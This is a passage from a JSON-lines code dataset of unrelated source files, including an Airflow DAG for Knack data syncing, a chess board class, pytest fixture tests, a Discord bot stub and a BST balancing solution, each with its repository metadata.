\"opitem\": \"atd-knack-services PostgREST\",\n \"opfield\": \"production.jwt\",\n },\n \"SOCRATA_API_KEY_ID\": {\n \"opitem\": \"Socrata Key ID, Secret, and Token\",\n \"opfield\": \"socrata.apiKeyId\",\n },\n \"SOCRATA_API_KEY_SECRET\": {\n \"opitem\": \"Socrata Key ID, Secret, and Token\",\n \"opfield\": \"socrata.apiKeySecret\",\n },\n \"SOCRATA_APP_TOKEN\": {\n \"opitem\": \"Socrata Key ID, Secret, and Token\",\n \"opfield\": \"socrata.appToken\",\n },\n 
\"AGOL_USERNAME\": {\n \"opitem\": \"ArcGIS Online (AGOL) Scripts Publisher\",\n \"opfield\": \"production.username\",\n },\n \"AGOL_PASSWORD\": {\n \"opitem\": \"ArcGIS Online (AGOL) Scripts Publisher\",\n \"opfield\": \"production.password\",\n },\n}\n\n\nwith DAG(\n dag_id=\"atd_knack_markings_work_orders_jobs\",\n description=\"Load work orders markings jobs (view_3100) records from Knack to Postgrest to AGOL, Socrata\",\n default_args=DEFAULT_ARGS,\n # runs once at 1130a ct and again at 140pm ct\n schedule_interval=\"40 11,13 * * *\" if DEPLOYMENT_ENVIRONMENT == \"production\" else None,\n tags=[\"repo:atd-knack-services\", \"knack\", \"socrata\", \"agol\", \"signs-markings\"],\n catchup=False,\n) as dag:\n docker_image = \"atddocker/atd-knack-services:production\"\n app_name = \"signs-markings\"\n container = \"view_3100\"\n\n date_filter_arg = get_date_filter_arg(should_replace_monthly=True)\n\n env_vars = get_env_vars_task(REQUIRED_SECRETS)\n\n t1 = DockerOperator(\n task_id=\"atd_knack_markings_work_orders_jobs_to_postgrest\",\n image=docker_image,\n auto_remove=True,\n command=f\"./atd-knack-services/services/records_to_postgrest.py -a {app_name} -c {container} {date_filter_arg}\",\n environment=env_vars,\n tty=True,\n force_pull=True,\n mount_tmp_dir=False,\n )\n\n\n t2 = DockerOperator(\n task_id=\"atd_knack_markings_work_orders_jobs_to_agol\",\n image=docker_image,\n auto_remove=True,\n command=f\"./atd-knack-services/services/records_to_agol.py -a {app_name} -c {container} {date_filter_arg}\",\n environment=env_vars,\n tty=True,\n force_pull=True,\n mount_tmp_dir=False,\n )\n\n t3 = DockerOperator(\n task_id=\"atd_knack_markings_jobs_agol_build_markings_segment_geometries\",\n image=docker_image,\n auto_remove=True,\n command=f'./atd-knack-services/services/agol_build_markings_segment_geometries.py -l markings_jobs {date_filter_arg}',\n environment=env_vars,\n tty=True,\n mount_tmp_dir=False,\n )\n\n t4 = DockerOperator(\n task_id=\"atd_knack_markings_work_orders_jobs_to_socrata\",\n image=docker_image,\n auto_remove=True,\n command=f'./atd-knack-services/services/records_to_socrata.py -a {app_name} -c {container} {date_filter_arg}',\n environment=env_vars,\n tty=True,\n mount_tmp_dir=False,\n )\n\n date_filter_arg >> t1 >> t2 >> t3 >> t4\n","sub_path":"dags/atd_knack_markings_work_orders_jobs.py","file_name":"atd_knack_markings_work_orders_jobs.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340266039","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport sys\n\nsys.dont_write_bytecode = True\n\n\nmoltype_dict = {1: \"wat\", 2: \"wat\", 3: \"poly\"}\nblength = {\"poly\": 1.53, \"wat\": 1.}\nbtype_dict = {\"wat\": 1, \"poly\": 2}\nbondtoangle_type_dict = {1:1, 2:2}\ntol = 1e-2\n\ndef isBonded(atom1,atom2):\n\n\thasBond = 0\n\tbtype = 0\n\n\tatomtype_1 = int(atom1.split()[2])\n\tatomtype_2 = int(atom2.split()[2])\n\tmoltype = moltype_dict[atomtype_1]\n\tblen = blength[moltype]\n\tpos1 = [float(atom1.split()[-3]), float(atom1.split()[-2]), float(atom1.split()[-1])]\n\tpos2 = [float(atom2.split()[-3]), float(atom2.split()[-2]), float(atom2.split()[-1])]\n\tpos1 = np.array(pos1)\n\tpos2 = np.array(pos2)\n\tthis_blen = np.linalg.norm(pos1-pos2)\n\tif abs(this_blen - blen) <= tol:\n\t\tbtype = btype_dict[moltype]\n\t\thasBond = 1\n\n\treturn (hasBond, btype)\n\n\n\n\n\n\ndef isAngle(bond1,bond2):\n\n\thasAngle = 0\n\tatype = 0\n\tangle = (0,0,0)\n\tcenter = 0\n\n\tatoms = 
{}\n\tbtype1 = int(bond1.split()[1])\n\tbtype2 = int(bond2.split()[1])\n\tatoms[int(bond1.split()[-1])] = btype1\n\tatoms[int(bond1.split()[-2])] = btype1\n\tatoms[int(bond2.split()[-1])] = btype2\n\tatoms[int(bond2.split()[-2])] = btype2\n\n\tidlist = [int(bond1.split()[-2]),int(bond1.split()[-1]),int(bond2.split()[-2]),int(bond2.split()[-1])]\n\n\tfor i, atom in enumerate(idlist):\n\t\tif idlist.count(atom)>1:\n\t\t\t\tcenter = atom\n\t\t\t\tidlist.pop(i)\n\n\tif center:\n\t\thasAngle = 1\n\t\tfor j, atom in enumerate(idlist):\n\t\t\tif atom==center: idlist.pop(j)\n\n\t\tangle = (idlist[0],center,idlist[1])\n\t\tatype = atoms[center]\n\n\treturn(hasAngle,atype,angle)\n\n\n\n\n\n\n","sub_path":"makeLammps/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"497433203","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('about', '0003_auto_20160520_2116'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='email',\n name='success',\n field=models.NullBooleanField(help_text=b'Whether send email successfully.', verbose_name=b'success'),\n ),\n ]\n","sub_path":"apps/about/migrations/0004_auto_20160520_2117.py","file_name":"0004_auto_20160520_2117.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330513150","text":"\"\"\"\n\nBoard class, representing the board with pieces\nauthor: @fuego\n\n\"\"\"\n\nfrom piece import *\nfrom rule import Rule\nfrom copy import deepcopy\nimport logging\n\n\nclass Board():\n def __init__(self, state=\"PLAYING\"):\n self.pieces = [[None for _ in range(8)] for _ in range(8)]\n self.loses = []\n self.state = state\n self.token = \"test\"\n self.rules = []\n self.turn = \"w\"\n logging.info('Board created')\n\n def init_game(self):\n whites = [Piece(\"w\", \"P\", [1, 0]),\n Piece(\"w\", \"P\", [1, 1]),\n Piece(\"w\", \"P\", [1, 2]),\n Piece(\"w\", \"P\", [1, 3]),\n Piece(\"w\", \"P\", [1, 4]),\n Piece(\"w\", \"P\", [1, 5]),\n Piece(\"w\", \"P\", [1, 6]),\n Piece(\"w\", \"P\", [1, 7]),\n Piece(\"w\", \"K\", [0, 4]),\n Piece(\"w\", \"Q\", [0, 3]),\n Piece(\"w\", \"N\", [0, 1]),\n Piece(\"w\", \"N\", [0, 6]),\n Piece(\"w\", \"R\", [0, 0]),\n Piece(\"w\", \"R\", [0, 7]),\n Piece(\"w\", \"B\", [0, 2]),\n Piece(\"w\", \"B\", [0, 5])]\n\n for piece in whites:\n self.place_piece(piece)\n for rule in piece.get_rules():\n self.rules.append(Rule(rule, self, piece))\n\n blacks = deepcopy(whites)\n for piece in blacks:\n piece.set_side(\"b\")\n piece.set_position([7 - piece.get_position()[0], piece.get_position()[1]], False)\n self.place_piece(piece)\n for rule in piece.get_rules():\n self.rules.append(Rule(rule, self, piece))\n\n logging.info('Game created')\n\n def place_piece(self, piece):\n self.pieces[piece.get_position()[0]][piece.get_position()[1]] = piece\n logging.debug('Piece placed to {}'.format(piece.get_position()))\n\n def remove_piece(self, piece):\n self.pieces[piece.get_position()[0]][piece.get_position()[1]] = None\n logging.debug('Piece removed from {}'.format(piece.get_position()))\n\n def move_piece(self, old_coordinates, move):\n piece = self.pieces[old_coordinates[0]][old_coordinates[1]]\n if piece is None:\n return False\n\n if 0 <= move[0] < 8 and 0 <= move[1] < 8:\n destination = 
self.pieces[move[0]][move[1]]\n if destination is not None:\n if destination.get_side() == piece.get_side():\n logging.debug('Destination and source are on the same side')\n return False\n else:\n logging.debug('Attack attempt')\n if self.is_allowed_attack(piece, move):\n for rule in self.rules:\n if not rule.get_replace():\n if not rule.is_respected(piece, move):\n return False\n self.pieces[old_coordinates[0]][old_coordinates[1]] = None\n self.loses.append(self.pieces[move[0]][move[1]])\n self.pieces[move[0]][move[1]] = piece\n piece.set_position([move[0], move[1]])\n logging.info('Attack successful')\n return True\n else:\n logging.debug('Attack failed')\n return False\n else:\n logging.debug('Movement attempt')\n if self.is_allowed(piece, move):\n for rule in self.rules:\n if not rule.get_replace():\n if not rule.is_respected(piece, move):\n return False\n self.pieces[old_coordinates[0]][old_coordinates[1]] = None\n self.pieces[move[0]][move[1]] = piece\n piece.set_position([move[0], move[1]])\n logging.debug('Movement successful')\n return True\n else:\n logging.debug('Movement failed')\n return False\n else:\n return False\n\n def check_move(self, piece, move, ref_array):\n position = [piece.get_position()[0], piece.get_position()[1]]\n gradient = [move[0] - position[0], move[1] - position[1]]\n\n if not piece.get_across():\n if gradient[0] >= 0:\n i_tab = range(1, gradient[0])\n else:\n i_tab = range(gradient[0] + 1, 0)\n if gradient[1] >= 0:\n j_tab = range(1, gradient[1])\n else:\n j_tab = range(gradient[1] + 1, 0)\n if gradient[1] == 0:\n for i in i_tab:\n if 0 <= i + position[0] < 8:\n if self.pieces[i + position[0]][position[1]] is not None:\n logging.debug('Obstacle in ({}, {})'.format(i + position[0], position[1]))\n return False\n if gradient[0] == 0:\n for j in j_tab:\n if 0 <= j + position[1] < 8:\n if self.pieces[position[0]][j + position[1]] is not None:\n logging.debug('Obstacle in ({}, {})'.format(position[0], j + position[1]))\n return False\n for i in i_tab:\n for j in j_tab:\n if 0 <= i + position[0] < 8 and 0 <= j + position[1] < 8:\n if self.pieces[i + position[0]][j + position[1]] is not None and abs(i) == abs(j):\n logging.debug('Obstacle in ({}, {})'.format(i + position[0], j + position[1]))\n return False\n\n for rule in self.rules:\n if rule.get_replace():\n if rule.is_respected(piece, move):\n logging.debug('Special rule applied')\n return True\n\n for possibilities in ref_array[0]:\n if gradient == possibilities:\n logging.debug('Possibility found')\n return True\n if ref_array[1]:\n if possibilities[0] >= 0:\n alpha_tab = range(1, possibilities[0])\n else:\n alpha_tab = range(possibilities[0]+1, 1)\n if possibilities[1] >= 0:\n beta_tab = range(1, possibilities[1])\n else:\n beta_tab = range(possibilities[1]+1, 1)\n if ref_array[3]:\n for alpha in alpha_tab:\n if gradient == [alpha, 0]:\n return True\n for beta in beta_tab:\n if gradient == [0, beta]:\n return True\n if ref_array[2]:\n for alpha in alpha_tab:\n for beta in beta_tab:\n if gradient == [alpha, beta] and abs(alpha) == abs(beta):\n return True\n\n return False\n\n def is_allowed(self, piece, move):\n return self.check_move(piece, move, piece.get_movement())\n\n def is_allowed_attack(self, piece, move):\n if piece.get_attack():\n return self.check_move(piece, move, piece.get_attack())\n else:\n return self.is_allowed(piece, move)\n\n def get_pieces(self):\n pieces = []\n for row in self.pieces:\n for piece in row:\n if piece is not None:\n pieces.append(piece)\n return pieces\n\n def get_piece(self, coord):\n 
return self.pieces[coord[0]][coord[1]]\n\n def check(self):\n return True\n\n def reverse(self):\n reverse = self.pieces[::-1]\n self.pieces = [list(row) for row in zip(*reverse)]\n reverse = self.pieces[::-1]\n self.pieces = [list(row) for row in zip(*reverse)]\n\n def print_pretty(self):\n line_str = \"---------------------------------\"\n print(line_str)\n for row in self.pieces:\n row_str = \"|\"\n for column in row:\n if column is None:\n row_str += \" |\"\n else:\n row_str += \" {0} |\".format(column.get_initial())\n print(row_str)\n print(line_str)\n","sub_path":"board/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":8315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"566588914","text":"import xml.etree.ElementTree as ET\r\nfrom set_path_to_InScript import path_to_InScript\r\nimport os\r\n\r\nimport string\r\n\r\nscenario = input(\"Please choose one scenario from: cake, library, flight, haircut, grocery, train, tree, bicycle, bus, bath\")\r\n\r\n\r\n\r\nwith open(\"InScriptESDs.txt\",\"w\") as file:\r\n pfade = [path_to_InScript+scenario+\"/\"+datei for datei in os.listdir(path_to_InScript+scenario)]\r\n for pfad in pfade:\r\n print(pfad)\r\n zeile = \"\"\r\n testzeile = \"\"\r\n try:\r\n tree = ET.parse(pfad)\r\n except FileNotFoundError:\r\n continue\r\n events = dict()\r\n partizipanten = dict()\r\n corefs = dict()\r\n ids = dict()\r\n for event in tree.find(\"annotations\").find(\"events\").findall(\"label\"):\r\n eventlabel = event.get(\"name\")\r\n if not eventlabel in [\"Evoking\",\"RelNScrEv\",\"Unclear\",\"UnrelEv\"]:\r\n satznummer = event.get(\"from\").split(\"-\")[0]\r\n index = (event.get(\"from\"),event.get(\"to\"))\r\n if not index[1]:\r\n wortnummern = [index[0].split(\"-\")[1]]\r\n else:\r\n wortnummern = [str(n) for n in range(int(index[0].split(\"-\")[1]),int(index[1].split(\"-\")[1])+1)]\r\n if not satznummer in events:\r\n events[satznummer]=dict()\r\n events[satznummer][index]=dict()\r\n events[satznummer][index][\"label\"]=eventlabel[6:]\r\n events[satznummer][index][\"text\"]=event.get(\"text\")\r\n events[satznummer][index][\"wortindices\"]=wortnummern\r\n for partizipant in tree.find(\"annotations\").find(\"participants\").findall(\"label\"):\r\n satznummer = partizipant.get(\"from\").split(\"-\")[0]\r\n index = (partizipant.get(\"from\"),partizipant.get(\"to\"))\r\n if not index[1]:\r\n wortnummern = [index[0].split(\"-\")[1]]\r\n else:\r\n wortnummern = [str(n) for n in range(int(index[0].split(\"-\")[1]),int(index[1].split(\"-\")[1])+1)]\r\n original_text = partizipant.get(\"text\")\r\n id_ = partizipant.get(\"id\")\r\n if not satznummer in partizipanten:\r\n partizipanten[satznummer] = dict()\r\n partizipanten[satznummer][index]=dict()\r\n partizipanten[satznummer][index][\"label\"]=partizipant.get(\"name\")\r\n partizipanten[satznummer][index][\"text\"]= original_text\r\n partizipanten[satznummer][index][\"wortindices\"]=wortnummern\r\n ids[id_]= original_text\r\n partizipanten[satznummer][index][\"id\"]= id_\r\n del_liste = []\r\n for s in partizipanten:\r\n lang = []\r\n for p in partizipanten[s]:\r\n if len(partizipanten[s][p][\"wortindices\"])>1:\r\n lang.append(partizipanten[s][p])\r\n for p in partizipanten[s]:\r\n if len(partizipanten[s][p][\"wortindices\"])==1:\r\n index = partizipanten[s][p][\"wortindices\"][0]\r\n for l in lang:\r\n if index in l[\"wortindices\"]:\r\n del_liste.append((s,p))\r\n break\r\n for d in del_liste:\r\n del partizipanten[d[0]][d[1]]\r\n del_liste = []\r\n for s in events:\r\n lang = 
[]\r\n for e in events[s]:\r\n if len(events[s][e][\"wortindices\"])>1:\r\n lang.append(events[s][e])\r\n for e in events[s]:\r\n if len(events[s][e][\"wortindices\"])==1:\r\n index = events[s][e][\"wortindices\"][0]\r\n for l in lang:\r\n if index in l[\"wortindices\"]:\r\n del_liste.append((s,e))\r\n break\r\n for d in del_liste:\r\n del events[d[0]][d[1]]\r\n pronouns = \"yourselves Yourselves Themselves themselves myself Myself yourself Yourself himself Himself Herself herself itself Itself ourselves Ourselves I you he she it we they me him her us them my your his her its our their mine yours hers ours theirs this that these those You He She It We They Me Him Her Us Them My Your His Her Its Our Their Mine Yours Hers Ours Theirs This That These Those\".split()\r\n for kette in tree.find(\"annotations\").find(\"chains\").findall(\"chain\"):\r\n c_ids = kette.get(\"elements\").split()\r\n x = \"\"\r\n for i in c_ids:\r\n if not ids[i] in pronouns:\r\n x = ids[i]\r\n break\r\n if x:\r\n for i in c_ids:\r\n corefs[i]=x\r\n for satz in tree.find(\"text\").find(\"sentences\").findall(\"sentence\"):\r\n t = satz.get(\"id\")\r\n dep = dict()\r\n lemmata = dict()\r\n wörter = dict()\r\n for token in satz.findall(\"token\"):\r\n token_id = token.get(\"id\")\r\n wörter[token_id]=token.get(\"content\")\r\n try:\r\n lemmata[token_id]=token.find(\"lemma\").get(\"type\")\r\n except AttributeError:\r\n pass\r\n try:\r\n d = token.find(\"dep\")\r\n head = d.get(\"head\")\r\n relation = d.get(\"type\")\r\n if not head in dep:\r\n dep[head]=dict()\r\n dep[head][token_id]=relation\r\n except AttributeError:\r\n pass\r\n if t in events:\r\n for event in events[t]:\r\n evaluierungsid = event[0].split(\"-\")[1]\r\n eventlabel = events[t][event][\"label\"]\r\n eventteile = dict()\r\n try:\r\n eventteile[int(event[0].split(\"-\")[1])]=(lemmata[event[0]],\"V\")\r\n except KeyError:\r\n eventteile[int(event[0].split(\"-\")[1])]=(wörter[event[0]],\"V\")\r\n if event[1]:\r\n eventteile[int(event[1].split(\"-\")[1])]= (wörter[event[1]],len(wörter[event[1]].split()))\r\n \r\n import math\r\n weitweg = -math.inf\r\n for p in partizipanten[t]:\r\n for index in p:\r\n try:\r\n if ((index in dep[event[0]]) or (index in dep[event[1]])):\r\n if int(index.split(\"-\")[1]) > weitweg:\r\n try:\r\n if int(index.split(\"-\")[1])> int(event[0].split(\"-\")[1]):\r\n weitweg = int(index.split(\"-\")[1])\r\n except KeyError:\r\n pass\r\n except KeyError:\r\n pass\r\n try:\r\n i = int(event[1].split(\"-\")[1])+1\r\n except AttributeError:\r\n i = int(event[0].split(\"-\")[1])+1 \r\n while i < weitweg+1:\r\n index = t+\"-\"+str(i)\r\n partizipant = None\r\n for p in partizipanten[t]:\r\n if index in p:\r\n partizipant = p\r\n if partizipant:\r\n for p in partizipant:\r\n if p:\r\n i += 1\r\n if partizipanten[t][partizipant][\"text\"] in pronouns:\r\n if partizipanten[t][partizipant][\"label\"] in corefs:# If pronouns are to be replaced, write id instead of label\r\n eventteile[int(p.split(\"-\")[1])] = (corefs[partizipanten[t][partizipant][\"label\"]],len(corefs[partizipanten[t][partizipant][\"label\"]].split()))# If pronouns are to be replaced, write id instead of label\r\n\r\n else:\r\n eventteile[int(p.split(\"-\")[1])] = (partizipanten[t][partizipant][\"text\"],len(partizipanten[t][partizipant][\"text\"].split()))\r\n \r\n else:\r\n eventteile[i] = (wörter[index],len(wörter[index].split()))\r\n i+=1\r\n \r\n \r\n \r\n \r\n eventtext = \"\"\r\n eventtest = \"\"\r\n sort = sorted(eventteile)\r\n for s in sort:\r\n test = 
eventtext.split()\r\n test2 = eventteile[s][0].split()\r\n if not test2 == test[-len(test2):]:\r\n eventtext += eventteile[s][0]+\" \"\r\n if eventteile[s][1]==\"V\":\r\n eventtest+=\"V\"\r\n else:\r\n for strich in range(0,eventteile[s][1]):\r\n eventtest+=\"-\"\r\n\r\n \r\n for w in eventtext.split():\r\n wortneu = \"\"\r\n for char in w.lower():\r\n if not char in string.punctuation:\r\n wortneu += char\r\n if wortneu:\r\n if not wortneu in [\"i\",\"we\",\"they\",\"then\"]:\r\n zeile += w+\" \"\r\n zeile=zeile.strip()\r\n zeile+=\"###\"+eventlabel+\"*\"\r\n file.write(zeile[:-1]+\"\\n\")\r\n \r\n \r\n \r\n\r\n","sub_path":"extract_only_relevant_EDs.py","file_name":"extract_only_relevant_EDs.py","file_ext":"py","file_size_in_byte":9959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"277861231","text":"from collections import defaultdict\n\nfrom pytest_cases import fixture, fixture_union, parametrize\n\nused = defaultdict(lambda: False)\ntorn_down = defaultdict(lambda: False)\n\n\n@fixture(scope='session')\ndef s1():\n name = 's1'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='session')\ndef s2():\n name = 's2'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='session')\ndef s3():\n name = 's3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='module')\ndef M1s1s2(s1, s2):\n name = 'M1s1s2'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='module')\ndef M2s1s3(s1, s3):\n name = 'M2s1s3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\ndef F1M1s1s2(M1s1s2):\n name = 'F1M1s1s2'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\n@parametrize(i=[0, 1])\ndef F2(i):\n name = 'F2(%s)' % i\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\ndef F3s2s3(s2, s3):\n name = 'F3s2s3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\ndef F4M2s1s3(M2s1s3):\n name = 'F4M2s1s3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\nd = fixture_union('d', (F1M1s1s2, F2, F3s2s3, F4M2s1s3))\n\n\nsuper_closure = None\n\n\ndef test_foo(d, request):\n # store closure for later analysis or test\n global super_closure\n super_closure = request._pyfuncitem._fixtureinfo.names_closure\n\n\ndef test_synthesis(module_results_dct):\n assert all(torn_down.values())\n assert list(module_results_dct) == [\n 'test_foo[d_is_F1M1s1s2]',\n 'test_foo[d_is_F2-i=0]',\n 'test_foo[d_is_F2-i=1]',\n 'test_foo[d_is_F3s2s3]',\n 'test_foo[d_is_F4M2s1s3]'\n ]\n\n function_scoped = ('F1M1s1s2', 'F2(0)', 'F2(1)', 'F3s2s3', 'F4M2s1s3')\n module_scoped = ('M1s1s2', 'M2s1s3')\n session_scoped = ('s1', 's2', 's3')\n\n for item in function_scoped + module_scoped + session_scoped:\n assert used[item] == 1, \"item %s was not used once\" % item\n\n if item in function_scoped:\n assert torn_down[item] == 1, \"item %s was not torn down once\" % item\n # else we know that the last module/session 
fixture alive is not properly torn down; this is a pytest issue\n\n\n# def test_super_closure():\n# global super_closure\n# print(super_closure)\n","sub_path":"pytest_cases/tests/pytest_extension/fixtures/fixture_unions/test_fixture_union_setup_teardown2.py","file_name":"test_fixture_union_setup_teardown2.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"80602474","text":"import urllib.request\nimport os\n\n#If a link does not have .jpg at the end, add it\ndef ifNoExtensionAdd(url):\n if url[-4:] != '.jpg' and url[-4:] != '.png':\n new_url = url + '.jpg' \n return new_url\n else:\n return url\n\ndef handleLink(url):\n #Check if imgur or reddit\n #To-Do: Add more sites for better compatibility\n try:\n #Checks for the various states the imgur url can come in\n if url.find('i.imgur') != -1:\n fixed_url = ifNoExtensionAdd(url)\n image = fixed_url[20:] #for imgur image, strip everything but id and .jpg\n return [True, fixed_url, image] #boolean for whether or not it failed\n \n elif url.find('imgur') != -1:\n jpg_url = ifNoExtensionAdd(url) \n fixed_url = jpg_url[:8] + 'i.' + jpg_url[8:] #Add i to imgur link if it's not there. \n image = fixed_url[20:] #for imgur image, strip everything but id and .jpg\n return [True, fixed_url, image] #boolean for whether or not it failed\n\n elif url.find('redd.it') != -1:\n fixed_url = ifNoExtensionAdd(url) \n image = fixed_url[18:] #for imgur image, strip everything but id and .jpg\n return [True, fixed_url, image] #boolean for whether or not it failed \n else:\n #If not from a supported url, return False\n return [False, url, 'Not supported:']\n \n except:\n return [False, 'Unidentified error during handleLink', url]\n\n#Moves the downloaded image to wherever you would like to store it.\ndef moveImage(image_name, image_directory):\n file_location = image_directory + image_name\n \n try:\n os.rename(image_name, file_location)\n \n return [True, file_location, 'Moved image to ' + file_location]\n except:\n return [False, file_location, 'Failed to move file']\n\n#Finds the image from the url and downloads it.\ndef getImage(url, image_location, image_directory):\n try:\n urllib.request.urlretrieve(url, image_location)\n image_moved = moveImage(image_location, image_directory)\n\n if(image_moved[0]):\n return [True, image_moved[1], 'Obtained and moved image to image folder'] \n else:\n return [False, url, image_moved[2] + ' | ' + image_moved[1]]\n except:\n return [False, url, 'Failed to get image']\n \n#Formats the tweet to prepare it for sending.\ndef prepareTweet(title, url, source):\n #Include source if possible.\n try:\n tweet_text = title + '\\nThis was posted at ' + url + '.\\n' + 'Found on Reddit.com/r/' + source\n return [True, tweet_text]\n except:\n return [False, 'Error creating tweet (link_image_handling > prepareTweet)']\n \n \n \n","sub_path":"link_image_handling.py","file_name":"link_image_handling.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"276830824","text":"from django.contrib import admin\nfrom gallery.models import Album, Picture\n\nclass PictureInline(admin.TabularInline):\n\tmodel = Picture\n\textra = 1\n\nclass AlbumAdmin(admin.ModelAdmin):\n\tfieldsets = [\n\t\t(None,\t\t\t\t{'fields': ['album_name']}),\n\t]\n\tinlines = [PictureInline]\n\n\tlist_display = ('album_name', 
'was_published_recently')\n#Album.objects.get().picture_set.count(),\nadmin.site.register(Album, AlbumAdmin)\n","sub_path":"gallery/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269755861","text":"import os\n\nimport discord\nfrom discord.ext import commands\n\n\ntoken = os.getenv('token')\nprefix_char = '#'\nbot = commands.Bot(command_prefix = prefix_char)\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as: {} - {}'.format(bot.user.name, bot.user.id))\n\n\nbot.run(token)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49771826","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 04 10:57:24 2015\r\n\r\n@author: Yiji\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef main():\r\n in_filename = 'train.csv'\r\n out_filename = 'sample.csv'\r\n nlinesfile = 145232\r\n nlinesrandomsample = 10000\r\n# nlinesfile = 6\r\n# nlinesrandomsample = 3\r\n lines2skip = np.random.choice(np.arange(1,nlinesfile+1), (nlinesfile-nlinesrandomsample), replace=False)\r\n df = pd.read_csv(in_filename, skiprows=lines2skip,low_memory=False)\r\n df.to_csv(out_filename, sep=',',index=False)\r\n \r\n\r\nmain()","sub_path":"springleaf_project/utils/samplecsv.py","file_name":"samplecsv.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483228891","text":"\"\"\"\n1382. Balance a Binary Search Tree\nMedium\n\nGiven a binary search tree, return a balanced binary search tree with the same node values.\n\nA binary search tree is balanced if and only if the depth of the two subtrees of every node never differ by more than 1.\n\nIf there is more than one answer, return any of them.\n\nExample 1:\n\nInput: root = [1,null,2,null,3,null,4,null,null]\nOutput: [2,1,3,null,null,null,4]\nExplanation: This is not the only correct answer, [3,1,4,null,2,null,null] is also correct.\n\nConstraints:\n\nThe number of nodes in the tree is between 1 and 10^4.\nThe tree nodes will have distinct values between 1 and 10^5.\n\"\"\"\n\nfrom typing import List\n\nimport sys\nsys.path.insert(1, '../../leetcode/tree/')\n\nfrom binary_tree import TreeNode, print_tree, array_to_bt_lc\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n###############################################################################\n\"\"\"\nSolution: use inorder traversal to build sorted array of tree nodes from\nBST. 
Then use recursion to build balanced BST from sorted array.\n\nO(n) time\nO(n) extra space: for sorted array\n\"\"\"\nclass Solution:\n def balanceBST(self, root: TreeNode) -> TreeNode:\n def inorder(root): # build sorted array\n if not root:\n return\n \n inorder(root.left)\n arr.append(root)\n inorder(root.right)\n \n def build(start, end): # build balanced BST using sorted array\n if start > end:\n return\n \n mid = start + (end - start) // 2\n node = arr[mid]\n \n node.left = build(start, mid-1)\n node.right = build(mid+1, end)\n \n return node\n \n arr = []\n inorder(root) # build sorted array\n \n return build(0, len(arr)-1) # build balanced BST using sorted array\n \n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n root = array_to_bt_lc(arr)\n \n print()\n print_tree(root)\n\n root = sol.balanceBST(root)\n\n print()\n print_tree(root)\n\n\n sol = Solution()\n\n comment = \"LC example\"\n arr = [1,None,2,None,3,None,4,None,None]\n test(arr, comment)\n ","sub_path":"bst/1382_balance_BST.py","file_name":"1382_balance_BST.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"289353133","text":"# -*- coding: utf-8 -*-\n\nimport theano\nimport theano.tensor as T\nimport numpy as np\nimport cPickle\nimport logging\nimport collections\nlogger = logging.getLogger(__name__)\n\nfrom theano import scan\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams\nfrom theano.tensor.nnet.conv3d2d import *\nfrom collections import OrderedDict\n\nfrom model import *\nfrom utils import *\n\nimport operator\n\n# Theano speed-up\ntheano.config.scan.allow_gc = False\n#\n\ndef add_to_params(params, new_param):\n params.append(new_param)\n return new_param\n \nclass WhenstHourModel(Model):\n def __init__(self, state, test_mode=False):\n Model.__init__(self)\n self.rng = numpy.random.RandomState(state['seed'])\n self.state = state\n self.__dict__.update(state)\n self.test_mode = test_mode\n self.name = 'WhenstHourModel'\n self.active = eval(self.active)\n self.params = []\n 